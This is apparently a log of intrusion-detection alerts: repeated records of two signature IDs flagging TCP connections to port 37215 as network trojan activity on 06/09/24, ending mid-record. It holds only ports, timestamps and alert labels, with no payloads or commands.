          SID:2835222
          Source Port:37708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.284968
          SID:2835222
          Source Port:56898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252477
          SID:2835222
          Source Port:47098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472049
          SID:2835222
          Source Port:52122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892597
          SID:2835222
          Source Port:56554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161807
          SID:2829579
          Source Port:42734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079434
          SID:2829579
          Source Port:57264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718394
          SID:2835222
          Source Port:53262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918214
          SID:2829579
          Source Port:52604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914839
          SID:2835222
          Source Port:44618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861925
          SID:2829579
          Source Port:56280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244190
          SID:2835222
          Source Port:47928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.988963
          SID:2835222
          Source Port:34626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167271
          SID:2835222
          Source Port:40972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398363
          SID:2829579
          Source Port:56846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471794
          SID:2829579
          Source Port:39684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297759
          SID:2835222
          Source Port:49728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557490
          SID:2835222
          Source Port:57934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029597
          SID:2829579
          Source Port:45932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033772
          SID:2835222
          Source Port:43904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225610
          SID:2835222
          Source Port:59450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162255
          SID:2835222
          Source Port:53124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721022
          SID:2835222
          Source Port:42898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290537
          SID:2835222
          Source Port:43486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676209
          SID:2829579
          Source Port:54938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230232
          SID:2835222
          Source Port:46372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294090
          SID:2829579
          Source Port:39502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604559
          SID:2835222
          Source Port:38170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038205
          SID:2829579
          Source Port:56256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.541573
          SID:2829579
          Source Port:54870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288913
          SID:2835222
          Source Port:36114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.740662
          SID:2829579
          Source Port:53844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931321
          SID:2835222
          Source Port:50270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.292220
          SID:2835222
          Source Port:46532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890643
          SID:2829579
          Source Port:32946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598010
          SID:2829579
          Source Port:60336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920513
          SID:2829579
          Source Port:58892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643856
          SID:2835222
          Source Port:50916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684563
          SID:2829579
          Source Port:58828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917062
          SID:2829579
          Source Port:51608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.941941
          SID:2829579
          Source Port:35834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.859284
          SID:2835222
          Source Port:34986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.668705
          SID:2835222
          Source Port:41838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164480
          SID:2829579
          Source Port:54800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247135
          SID:2835222
          Source Port:60082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947088
          SID:2829579
          Source Port:36712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996472
          SID:2829579
          Source Port:38476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538525
          SID:2829579
          Source Port:53562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168013
          SID:2829579
          Source Port:47104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.949772
          SID:2829579
          Source Port:58470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476924
          SID:2829579
          Source Port:50050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667686
          SID:2829579
          Source Port:59712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225606
          SID:2829579
          Source Port:57918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571508
          SID:2829579
          Source Port:59708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030869
          SID:2835222
          Source Port:60772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080172
          SID:2835222
          Source Port:55152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285771
          SID:2829579
          Source Port:50778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037578
          SID:2829579
          Source Port:47894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900302
          SID:2835222
          Source Port:43280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.092055
          SID:2829579
          Source Port:58330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716928
          SID:2829579
          Source Port:46242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157198
          SID:2835222
          Source Port:41640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719547
          SID:2829579
          Source Port:56436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861227
          SID:2835222
          Source Port:38786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274417
          SID:2835222
          Source Port:45908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167571
          SID:2829579
          Source Port:54182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945050
          SID:2829579
          Source Port:35348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396326
          SID:2835222
          Source Port:45266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465402
          SID:2829579
          Source Port:51342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720694
          SID:2835222
          Source Port:35014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283528
          SID:2835222
          Source Port:42332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926165
          SID:2835222
          Source Port:55112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299469
          SID:2829579
          Source Port:47054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282558
          SID:2829579
          Source Port:35790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036211
          SID:2835222
          Source Port:56332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283769
          SID:2835222
          Source Port:33756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.858755
          SID:2829579
          Source Port:38104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917124
          SID:2835222
          Source Port:46192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471952
          SID:2835222
          Source Port:57454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660789
          SID:2835222
          Source Port:36406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919051
          SID:2829579
          Source Port:43034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557713
          SID:2829579
          Source Port:42788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102696
          SID:2835222
          Source Port:36528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412469
          SID:2829579
          Source Port:54120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538571
          SID:2829579
          Source Port:55254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167637
          SID:2829579
          Source Port:56614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302579
          SID:2835222
          Source Port:35132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.399068
          SID:2829579
          Source Port:47786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914212
          SID:2835222
          Source Port:56212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014788
          SID:2829579
          Source Port:50772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159487
          SID:2835222
          Source Port:41824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244000
          SID:2835222
          Source Port:59838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286161
          SID:2835222
          Source Port:39302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.291227
          SID:2835222
          Source Port:57134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603112
          SID:2835222
          Source Port:55490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292374
          SID:2829579
          Source Port:47096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568258
          SID:2835222
          Source Port:36966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476153
          SID:2835222
          Source Port:59930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713736
          SID:2829579
          Source Port:35712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929857
          SID:2835222
          Source Port:57690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.100895
          SID:2829579
          Source Port:52272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079037
          SID:2835222
          Source Port:54284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162787
          SID:2835222
          Source Port:41322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467957
          SID:2829579
          Source Port:43954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.642837
          SID:2829579
          Source Port:33004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103931
          SID:2829579
          Source Port:47296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719935
          SID:2829579
          Source Port:58792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905326
          SID:2835222
          Source Port:36900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222736
          SID:2829579
          Source Port:48812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249548
          SID:2835222
          Source Port:39232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721703
          SID:2835222
          Source Port:33346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930146
          SID:2829579
          Source Port:57562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287470
          SID:2829579
          Source Port:43800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478921
          SID:2829579
          Source Port:48438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164502
          SID:2829579
          Source Port:41306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.101961
          SID:2835222
          Source Port:58564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277241
          SID:2835222
          Source Port:43916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.480838
          SID:2835222
          Source Port:59882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244223
          SID:2835222
          Source Port:58096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033544
          SID:2829579
          Source Port:58562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904403
          SID:2835222
          Source Port:54488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471730
          SID:2835222
          Source Port:60040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861077
          SID:2829579
          Source Port:43876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643966
          SID:2829579
          Source Port:48558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081887
          SID:2829579
          Source Port:57164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472220
          SID:2835222
          Source Port:48992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.039623
          SID:2829579
          Source Port:57298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540432
          SID:2835222
          Source Port:47128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820403
          SID:2829579
          Source Port:48946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720789
          SID:2835222
          Source Port:38286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866176
          SID:2835222
          Source Port:40768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869906
          SID:2829579
          Source Port:53006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990363
          SID:2829579
          Source Port:59962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867750
          SID:2835222
          Source Port:42286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230293
          SID:2835222
          Source Port:38062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035957
          SID:2829579
          Source Port:37752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032646
          SID:2835222
          Source Port:55010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.292260
          SID:2835222
          Source Port:47354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716968
          SID:2835222
          Source Port:35010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724121
          SID:2829579
          Source Port:49348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082699
          SID:2829579
          Source Port:59888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819772
          SID:2835222
          Source Port:44600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074384
          SID:2829579
          Source Port:37966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104096
          SID:2835222
          Source Port:47336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206069
          SID:2829579
          Source Port:56538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819875
          SID:2829579
          Source Port:46618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396811
          SID:2829579
          Source Port:39112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931611
          SID:2835222
          Source Port:46352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605713
          SID:2829579
          Source Port:47930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286795
          SID:2835222
          Source Port:57206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000413
          SID:2835222
          Source Port:51004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299121
          SID:2835222
          Source Port:57870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720164
          SID:2835222
          Source Port:57120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822070
          SID:2835222
          Source Port:52542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205655
          SID:2835222
          Source Port:35420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286926
          SID:2835222
          Source Port:60136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862726
          SID:2829579
          Source Port:54802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120646
          SID:2835222
          Source Port:42044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167271
          SID:2835222
          Source Port:39688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399241
          SID:2835222
          Source Port:54380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067332
          SID:2835222
          Source Port:48706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644960
          SID:2835222
          Source Port:48798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249670
          SID:2829579
          Source Port:46670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950983
          SID:2829579
          Source Port:44626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920902
          SID:2835222
          Source Port:49196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.668635
          SID:2829579
          Source Port:50952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.915085
          SID:2829579
          Source Port:47398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.269861
          SID:2829579
          Source Port:36594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014362
          SID:2829579
          Source Port:41120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248146
          SID:2835222
          Source Port:33062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010091
          SID:2835222
          Source Port:51016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603663
          SID:2835222
          Source Port:59334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909166
          SID:2829579
          Source Port:34192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298878
          SID:2835222
          Source Port:41918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284762
          SID:2835222
          Source Port:44742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864305
          SID:2829579
          Source Port:55292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990744
          SID:2835222
          Source Port:60918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253051
          SID:2835222
          Source Port:47154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867362
          SID:2835222
          Source Port:60184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289811
          SID:2829579
          Source Port:59264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944252
          SID:2835222
          Source Port:52034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004582
          SID:2829579
          Source Port:47028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917101
          SID:2835222
          Source Port:35648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163918
          SID:2829579
          Source Port:35280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012712
          SID:2829579
          Source Port:37016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944513
          SID:2829579
          Source Port:55696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890455
          SID:2829579
          Source Port:45508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950202
          SID:2829579
          Source Port:56994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418554
          SID:2835222
          Source Port:36150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414862
          SID:2829579
          Source Port:38036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033141
          SID:2835222
          Source Port:41448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.637975
          SID:2829579
          Source Port:59834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923256
          SID:2835222
          Source Port:34246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915748
          SID:2835222
          Source Port:52398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490275
          SID:2829579
          Source Port:43708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206891
          SID:2835222
          Source Port:42494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719351
          SID:2829579
          Source Port:44394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298359
          SID:2829579
          Source Port:58336
          Destination Port:37215
